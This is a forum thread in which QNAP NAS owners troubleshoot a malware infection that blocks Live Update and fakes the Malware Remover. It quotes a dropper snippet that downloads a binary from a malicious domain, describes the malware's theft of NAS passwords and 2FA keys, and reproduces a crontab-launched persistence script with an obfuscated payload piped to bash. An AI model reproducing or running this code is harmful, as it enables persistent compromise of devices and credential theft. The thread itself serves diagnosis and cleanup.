Since update to QTS 4.3.5 Live Update cannot be performed

[dolbyman]

start nas from scratch then .. infected beyond fix

[gnocchi_ny]

I ran the script but got some errors... any suggestions...

Code: Select all

[/] # curl https://download.qnap.com/Storage/tsd/utility/derek-be-gone.sh | sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5231  100  5231    0     0  20126      0 --:--:-- --:--:-- --:--:-- 33532
[o] System path: /share/MD0_DATA
[o] Removing fake qpkg
[*] Removing /share/MD0_DATA/.qpkg/.liveupdate/
rm: unable to remove `/share/MD0_DATA/.qpkg/.liveupdate/liveupdate.sh': Operation not permitted
rm: unable to remove `/share/MD0_DATA/.qpkg/.liveupdate/liveupdate.sh': Operation not permitted
rm: unable to remove `/share/MD0_DATA/.qpkg/.liveupdate': Directory not empty
  [-] Failed
---
[o] Cleaning DOM
 [*] Removing /tmp/config/K017liveupdate.sh
rm: unable to remove `/tmp/config/K017liveupdate.sh': Operation not permitted
  [-] Failed
 [*] Removing /tmp/config/K01UDwkDgXTeFn.sh
rm: unable to remove `/tmp/config/K01UDwkDgXTeFn.sh': Operation not permitted
 [-] Failed
---
[o] Remove old MR
 [*] Setting mutable 32bit on /share/MD0_DATA/.qpkg/MalwareRemover/
 [*] Setting mutable 32bit on /share/MD0_DATA/.qpkg/MalwareRemover//modules/10_derek_3.pyc
 [*] Setting mutable 32bit on /share/MD0_DATA/.qpkg/MalwareRemover//modules/12_derek_3.pyc
 [*] Removing /share/MD0_DATA/.qpkg/MalwareRemover/
  [+] Success!
---
[o] Install new MR
2019-01-28 21:51:08 URL:https://download.qnap.com/Storage/tsd/utility/MalwareRemover_3.4.0_20190121_173849.qpkg [297714/297714] -> "MalwareRemove       r_3.4.0_20190121_173849.qpkg" [1]
 [+] Success!
---
Finished!

[panchanclo]

install Malware remover 3.4.1 from qnap web

[gnocchi_ny]

install Malware remover 3.4.1 from qnap web

Did not work. Tried to install 3.4.1 manually and got the following error:

Type Date Time Users Source IP Computer name Content
Error 2019/01/30 23:49:19 System 127.0.0.1 localhost [App Center] Failed to install MalwareRemover due to data file error.

[QNAP_Daniel]

install Malware remover 3.4.1 from qnap web

Did not work. Tried to install 3.4.1 manually and got the following error:

Type Date Time Users Source IP Computer name Content
Error 2019/01/30 23:49:19 System 127.0.0.1 localhost [App Center] Failed to install MalwareRemover due to data file error.

Hi gnocchi_ny. Please open a support ticket at https://helpdesk.qnap.com or via the Helpdesk App in QTS so we can check why your NAS failed to install Malware Remover.

Thank you

[panchanclo]

install Malware remover 3.4.1 from qnap web

Did not work. Tried to install 3.4.1 manually and got the following error:

Type Date Time Users Source IP Computer name Content
Error 2019/01/30 23:49:19 System 127.0.0.1 localhost [App Center] Failed to install MalwareRemover due to data file error.

First use SSH command: "curl https://download.qnap.com/Storage/tsd/u ... be-gone.sh | sh" from this link: "https://www.reddit.com/r/qnap/comments/ ... _i_have_a/" and then install Malware remover 3.4.1 from qnap web

[gnocchi_ny]

install Malware remover 3.4.1 from qnap web

Did not work. Tried to install 3.4.1 manually and got the following error:

Type Date Time Users Source IP Computer name Content
Error 2019/01/30 23:49:19 System 127.0.0.1 localhost [App Center] Failed to install MalwareRemover due to data file error.

First use SSH command: "curl https://download.qnap.com/Storage/tsd/u ... be-gone.sh | sh" from this link: "https://www.reddit.com/r/qnap/comments/ ... _i_have_a/" and then install Malware remover 3.4.1 from qnap web

panchanclo I did the curl command and i posted my results from the SSH in my original post. It was suggested that I try to run 3.4.1 manually as a download and sideload as a possible solution. I have errors on the script posted in reddit.

[Painkiller]

Have same story: script runs, gives errors on removing directories, though I can't remove these files myself as well.

Anyway, after running the script, my QNAP TVS-671 runs fine: applications get updated - application store is available, QTS can check for updates, but until reboot. After reboot it again has no access to QTS updates, applications store repository again gets useless Malware Remover that pretends to perform but does not actually work. As if it stores startup config somewhere separately from running config. At the same time TS-459Pro works fine on the same network.

Placed ticket to HelpDesk - no reply so far. Wankers!

No Qnap again - too much effort, poor software & support.

[kkopachev]

Got the same thing.
Script mentioned above was unable to remove .liveupdate.sh. I had to do

Code: Select all

chattr -i .liveupdate.sh

to clear immutable attribute.
Also check your crontab for suspicious entries.

liveupdate.sh contained part of malicious code which downloads updates. https://pastebin.com/ksGWwbKy
Newly downloaded file got executed and executes following script: https://pastebin.com/pnWcRNyR It seems to be disabling antivirus updates, pretends newest malware remover installed and clears logs about malware remover and antivirus. Also downloads chattr binary to change file attributes to be immutable to prevent deletion.

[Painkiller]

Got the same thing.
Script mentioned above was unable to remove .liveupdate.sh. I had to do

Code: Select all

chattr -i .liveupdate.sh

to clear immutable attribute.
Also check your crontab for suspicious entries.

liveupdate.sh contained part of malicious code which downloads updates. https://pastebin.com/ksGWwbKy
Newly downloaded file got executed and executes following script: https://pastebin.com/pnWcRNyR It seems to be disabling antivirus updates, pretends newest malware remover installed and clears logs about malware remover and antivirus. Also downloads chattr binary to change file attributes to be immutable to prevent deletion.

Thanks a lot! I'm nub in linux, but your advice worked!

Had to inject "chattr -i" to remove all mentioned in the script objects. So far so good!

[gnocchi_ny]

Got the same thing.
Script mentioned above was unable to remove .liveupdate.sh. I had to do

Code: Select all

chattr -i .liveupdate.sh

to clear immutable attribute.
Also check your crontab for suspicious entries.

liveupdate.sh contained part of malicious code which downloads updates. https://pastebin.com/ksGWwbKy
Newly downloaded file got executed and executes following script: https://pastebin.com/pnWcRNyR It seems to be disabling antivirus updates, pretends newest malware remover installed and clears logs about malware remover and antivirus. Also downloads chattr binary to change file attributes to be immutable to prevent deletion.

Thanks a lot! I'm nub in linux, but your advice worked!

Had to inject "chattr -i" to remove all mentioned in the script objects. So far so good!

I used Putty to access the nas and ls'd to the location of the liveupdate.sh and tried to run the "chattr -i .liveupdate.sh" but I get a command not found error... what am i doing wrong?

[kkopachev]

I used Putty to access the nas and ls'd to the location of the liveupdate.sh and tried to run the "chattr -i .liveupdate.sh" but I get a command not found error... what am i doing wrong?

I have Intel-based NAS, so seems like my OS already contains chattr binary.
If you looked at the script I mentioned above, it downloads chattr binary from remote and uses it to set immutable attribute. I assume that some models might not have pre-installed chattr binary, so it has to be downloaded or compiled.

Code: Select all

if [ ! -f ".qdisk_cmd" ]; then
    case "$(uname -m)" in
    *x86_64*)
            arch=x86_64
            binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
            ;;
    *arm*|*aarch*)
            arch=arm
            binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
            ;;
    *i*86*)
            arch=i486
            binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
            ;;
    esac
   
    if [ "x${binhash}" != 'x' ]; then
        curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
        test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
        if [ "x${rsynchash}" = "x${binhash}" ]; then
            mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
        else
            rm -f '.qdisk_cmd.tmp'
        fi
    fi
fi

So you might try to look for

Code: Select all

.qdisk_cmd

binary in the same directory. Or compile it somehow? Or download one which is used by script itself (might be dangerous).

Domain name resolves through CloudFlare, I already reported malicious script to them.


It looks like content of downloaded script can change over time, which makes it hard to trace.
In version I've posted it removes all 0.0.0.0 entries from hosts file.
It makes NAS check local files for firmware updates. Files are valid and are same as original, so NAS would be always saying that you are all up to date and it won't show any errors.
It also pretends like Malware Remover are installed, changes it's version but removes parts which suppose to take care of the malicious script.
It mounts a volume and injects itself in autorun.sh and into K0*.sh scripts it can find there. I didn't have autorun.sh there, but had K07something.sh. I suspect they run on reboot.

At the end, after replacing web login form, script also sends all NAS passwords it could find. admin user password ans second factor key, smtp credentials (if you are sending notifications to email), samba passwords, QNAP ID and DDNS, and a bunch of data about device.

[gnocchi_ny]

I used Putty to access the nas and ls'd to the location of the liveupdate.sh and tried to run the "chattr -i .liveupdate.sh" but I get a command not found error... what am i doing wrong?

I have Intel-based NAS, so seems like my OS already contains chattr binary.
If you looked at the script I mentioned above, it downloads chattr binary from remote and uses it to set immutable attribute. I assume that some models might not have pre-installed chattr binary, so it has to be downloaded or compiled.

Code: Select all

if [ ! -f ".qdisk_cmd" ]; then
    case "$(uname -m)" in
    *x86_64*)
            arch=x86_64
            binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
            ;;
    *arm*|*aarch*)
            arch=arm
            binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
            ;;
    *i*86*)
            arch=i486
            binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
            ;;
    esac
   
    if [ "x${binhash}" != 'x' ]; then
        curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
        test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
        if [ "x${rsynchash}" = "x${binhash}" ]; then
            mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
        else
            rm -f '.qdisk_cmd.tmp'
        fi
    fi
fi

So you might try to look for

Code: Select all

.qdisk_cmd

binary in the same directory. Or compile it somehow? Or download one which is used by script itself (might be dangerous).

Domain name resolves through CloudFlare, I already reported malicious script to them.


It looks like content of downloaded script can change over time, which makes it hard to trace.
In version I've posted it removes all 0.0.0.0 entries from hosts file.
It makes NAS check local files for firmware updates. Files are valid and are same as original, so NAS would be always saying that you are all up to date and it won't show any errors.
It also pretends like Malware Remover are installed, changes it's version but removes parts which suppose to take care of the malicious script.
It mounts a volume and injects itself in autorun.sh and into K0*.sh scripts it can find there. I didn't have autorun.sh there, but had K07something.sh. I suspect they run on reboot.

At the end, after replacing web login form, script also sends all NAS passwords it could find. admin user password ans second factor key, smtp credentials (if you are sending notifications to email), samba passwords, QNAP ID and DDNS, and a bunch of data about device.

Thanks. Looks like I need to backup my data to my sata drive and re-image the NAS.

[alokeprasad]

Why hasn't QNAP responded to this?
They should report it on their security bulletin list and tell us what to do if infected and what not to do if not infected.
Everyone affected should open a support ticket to make them aware of the problems this is causing.

[gnocchi_ny]

I was contacted by support today. While we setup a time to investigate, I checked my crontab and a line as follows

Code: Select all

0 8 * * * /mnt/HDA_ROOT/.config/.qsys/set_home_directory.sh >/dev/null 2>&1

The contents are as follows and it looks suspicious. I may want to remove the line from the crontab. Thoughts???

Code: Select all

#!/bin/sh
( exec >/dev/null 2>&1; (
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
test -d "$confdir" || confdir=/etc/config
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
test "$fgrep" || fgrep=grep

if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
#!/bin/sh
UdGHAyyk=${wHAhSykPmeq}tr
GGfRDuNo='\'
gSxKrZYm=$DwlLdshDv$""${GGfRDuNo}133${zTUyNkEWyST}
FZuyMnaK=$cxuimPDcK$""${GGfRDuNo}055${QaAIyoUedpf}
TGfOiZJx=$AjgbiWDTO$""${GGfRDuNo}134${PbOFDmJAjQI}
$UdGHAyyk '%UD"zToge`'"'"'yC;'$gSxKrZYm'|cKLOHY<Qs}u+VGd'$TGfOiZJx'PJX#(xMS=nv{iFWl!m)IErRqwZN B\nfp&*kA'$FZuyMnaK'aj>ht]$b' '`<W*}&uQrV!$lLUviq#KhkHxO="Jb nDc'$gSxKrZYm'AI|wgyptY{N\n]BP+Gjo;m>fE'"'"'sX)'$TGfOiZJx'F(RSze'$FZuyMnaK'dZ%MCTa' << "JTOmoGdtG" | bas${GicO}h${FcNNuVzrtINYWp}
CC>!Hv!-otEK}y{IO\[z/Hy{!bEY]*zER-/Hy{$ cRQ]p+wwwEDzny{ XQlV>wzn=j/PMcy{S=kwK-QlzaVcd/jc Y/|cenoy{!vYlAOc\OnI*`Mzy{w`xwzbC_IVEj.Py{$tX$M>Ex=-okdXzyXQ![b><C;V=i#Y[yNNMcFy{Xi#]`!XxiegHzny{H>X#zey{ vvbsjIzGNfdCO=XhU!A< yH%R"xM-c';{gZ$mKY]Qrod+f133z(nf134*vVWf055BNuNuN`&}w>#IpEe
jDGkLTP)tlS[iqsb|u\NGNrYmf133ZfdqTeL]-(}'[RwvuSo|$+*BsAK&)bXnpf055H<{dlf134 NuNuNDGE"`Mh!xQUOVI>=Pz\jC;k#y
%itgcWNGUUGukx)x`)cZuGqGyCC>!Hv!-otEKF<R/
u*/W(hwy*AW+ANQiNhfNhNNNN)`ko)NW%FhNNNN)`ko)Nxu*%[f1:z4LFhNNNN)`ko)Nxop%[f2:z12LFhNNNN)`ko)NCWGoky%c[f3:zozYdzDLchNNNN+ANzPkNc[CWGokycNEN/Py{/;Ao*P`xNHNfNhNNNNNNNNAyoPNzA*N[QQ[$dsTKbN>NQN[xopNzN[xu*NON1NiNON[xu*NiiNWFhNNNNNNNNyk(`Nc[WchNNNNLhLhk`xxo*PNz{NxC+yxGNUN/Py{/*;))N2U!1NHHNxC+yxGNQiNfNh)`ko)NW;MMup%qwy*AW+AN6N6qh+yW+Nc[2cN!!NfNxCPuANc[f2>mmmmmmL[W;MMupcFNyk(`Nc[f2>mmmmmmL[W;MMupcFNLNHHNfN+`;k(Nc[f1>mmmmmmL[W;MMupcFNyk(`Nc[f1>>mmmmmmL[W;MMupcFNLhLhypykN2U/Py{/*;))h#dgn%c[f#dgnL:/
u*:/W
u*:/;WA/
u*:/;WA/W
u*:/;WA/
u*/m11:/;WA/)`ko)/W
u*:/;WA/)`ko)/
u*ch+yW+NRNzYNc[f|"X$-_lg$SsrLcNHHNfNGAu*+MNcTo+y:NcFNgD%rbgNPo+yFNypu+N0FNLhyk(`NcTo+y:Ng;yNs`{N10N23:57:34NrbgN2015chkA%qGAu*+MNaVAaNHHNyk(`Nz*yNaVAaqh+yW+Nc[f<kALcNzy]N1N!!Nyk(`Nc[kAcNHHNyk(`Ncch+yW+Ncp[ngg#_$XJX$X$cN%Ncp5yM96k1
60871
k71k002PP61y0P89ky32
38251cNHHNypu+N0h+yW+NRNzYNc[f0LcN!!N+yW+NqGWNo;pNHNwAyGNc[f0LcNHNIkNz)qNzw+N40N!!Nypu+N0hk`xxo*PNz{N`Gy*WW)NU/Py{/*;))N2U!1N!!Nfh#KlgTdgd%aahC%cwsY8j"j+'S``vjjmDS0vsY5Pwd]$Z`G4ch+yW+Ncp[f$X|"Xlg_bXgnKTLcN%Np#KlgN!!N+yW+NRNzYNc[f|"X$-_lg$SsrLcN!!NkoWyNc[f|"X$-_lg$SsrLcNu*NaaNHN&=R0z9\&NHN0&NiNMo)WyNFFN=0z9\=0z9\=0z9\=0z9\=0z9\=0z9\=0z9\=0z9\NiNP%c[QQNqPo+yNO>WqN/N100NiicFN+yW+Nc[f|"X$-_lg$SsrLcN%Nc[fPLcN!!Nk+%c[PcNHHNfN+yW+Nc[f|"X$-_lg$SsrLcN%Nc[QQN[PNzN1iicN!!Nk+%c[QQN[PNzN1NiicFNLNFFN&iNMo)WyNFFNyWokN!!N+yW+NRNzYNc[f|"X$-_lg$SsrLcN!!Nfh*)%ahahkoWyNc[f KsgXsg_tXsrgnLcNu*NaaNHN&=R0z9\&NHN0&NiNMo)WyNFFN&iN+yW+Nc[f KsgXsg_tXsrgnLcNz)+N2147483646NFFNyWokN!!NfNSJl%NAyoPNzPNaaNzA*Nc[f KsgXsg_tXsrgnLcN#KlgTdgdFN+yW+NzYNc[#KlgTdgdcN!!N#KlgTdgd%qPPN
W%1Nk`;*+%c[ KsgXsg_tXsrgncN2U/Py{/*;))qFNLNHHN+yW+Nc[#KlgTdgdcNHHN#KlgTdgd%qko+qNHHNypu+N0hW%c[f#KlgTdgd<<&.LchW+%c[fW<<&zLchW%c[fW>>z&LchP%c[QQN[PN/N1000Niich+yW+NRNzYNc[PcN!!N+yW+NRNzYNc[W+cN!!N+yW+Nc[f<W+LcN%N5N!!NfN+yW+Ncp[W+cN%Ncp[PcNHHN+yW+Ncp[W+cN%Ncp[QQN[PNzN1NiicFNLNHHNfN+yW+NzMNc[+cN!!NAxNc[+cFNypu+N0FNLhkoWyNc[WcNu*NaaNHN&=RozYdzD0z9/O%[*)\&NiN+yW+NzMNc[+cN!!NAxNc[+cFNypu+N0FNFFNyWokh+%qxC+yxGN/+xG/.+xG.mmmmmmqNHHNypu+N0hko+NUNc[+cNEEcXKJcNHHNfN+yW+NzMNc[+cN!!NAxNc[+cFNypu+N0FNLhzzzzzvXrSsN#"vtS NeX-zzzzzhbSSv`jdsvwC](Cur9I0vd|XJddK d-8dbSSvuwe d-Xd'urOn/1MktbMgs"{{vyWhKZ]06MKrxvJeS"K #W'rGd;YTA e)*v;n`t4(lX+*;pgvs+8jdvYPDOG9]"
dD3KhYo#xZSPW1wnn)1eJO|8n5
sPsW9b $CX{ "wZrJy3do)t7COj/$mvWBAWt ePreBhonOP+ 0sPtePCY(e8]v]Ynp Ob"rYyy5//KwTePkeyy)o wY"Zo0;u11vD3SjeG|h)7n`C}nx'Y$AZr#k;k4C)n9
e4lydTy($'j')u{n|k]le1WsWIoGZx2]Tj'|7(j$h$2WoKY;
g"I1O2|e)Ob'5lM'`/v8s`Gs-6XdKt8- #}n oG]2oM2D'+(o}22}GM-hY+YjX'5KCJs(6M$wDsG
W;b;4*#ov/Aw{ZxWBp93o*W(4Symu#'K;e}vox"D'S{thpA2Xl 2A(wB(]wZ;ut)nrOnbe63#`PvbJ'e]9AtP4(99*m
9Ou xJ|9MYZeW9llbhj7poPrGo
e2osgGs3YTd;XrS4DK+]pt]BjXnx0
XOD5JdwbvddX%hzzzzzXsTN#"vtS NeX-zzzzzhXKJh+yW+NRNzYNc[WcN!!N(%q`Gy*WW)N
oWy64NzPNEEXKJNHN`Gy*WW)NAWo;+)NzG;
u*Nzu*Cy'Nc[+cNz{yAuM'h[WhXKJhqNHHNfN+yW+NzMNc[+cN!!NAxNc[+cFNypu+N0FNLh+yW+NzMNc[+cN!!NAxNc[+chx%c[f#KlgTdgd>>.&Lch#KlgTdgd%aahkoWyNc[xcNu*NaaNHN&=RozYdzD0z9/O%[*)\&NiNypu+N0NFFNyWokhC%q`Gy*WW)NPwW+NzW(o1Nz
u*oA'Nz(xokNc[k+cNEEXKJNHN`Gy*WW)N
oWy64h[ChXKJhqhx%q`Gy*WW)Ny*kNzPNzoyWz256zk
kNzCNc[CcNzxPNW(o1NzWo)+NzoNEEXKJh[xhXKJhqhx(%q`Gy*WW)NPwW+NzW(o1Nz
u*oA'Nz(xokNc[W+cNEEXKJNHN`Gy*WW)N
oWy64h[xhXKJhqh+yW+NRNzYNc[(cN!!N+yW+Nc[(cN%Nc[x(cNHHNypu+N0hy{o)Nc[xch+A;yhLNHHNfh+%qxC+yxGN/+xG/.+xG.mmmmmmqNHHNypu+N0hko+NUNc[+cNEEcXKJcNHHNfN+yW+NzMNc[+cN!!NAxNc[+cFNypu+N0FNLhzzzzzvXrSsN#"vtS NeX-zzzzzhbSSv`jdsvwC](Cur9I0vd|XJddK d-8dbSSvuwe d-Xd9|xnbI4jI8 Kt-ewK]M h0rDW$lIJwupg0)ubk42DlAWWAWJrD)T#e35Y)Px
"WX|m+J-CTj}y"kCG2o(8JkMhdvJ"r8bt*)6Ig{prDIZZ
bt#Tu-`5)/P07vek
I-;]sGO2//2P;Cp 'oCKSS*S]JhtwAb5*{G5vevvkkb)bvoWJ+pDMJw+sj)|9u9xsMu53*o)Ab#$`)9euMB1-pxtI1Oh7rg;jJl)'e9dG{u/DS2'/{'x6sB
BXWoX5v9wwmZ-A}p)
epbSYB;mM18l2G48J(hG}"'-Z0xjT"k3luZ$4$u#uC#Gg|wClj'90obeA`B dP9b6kD+MI Y(b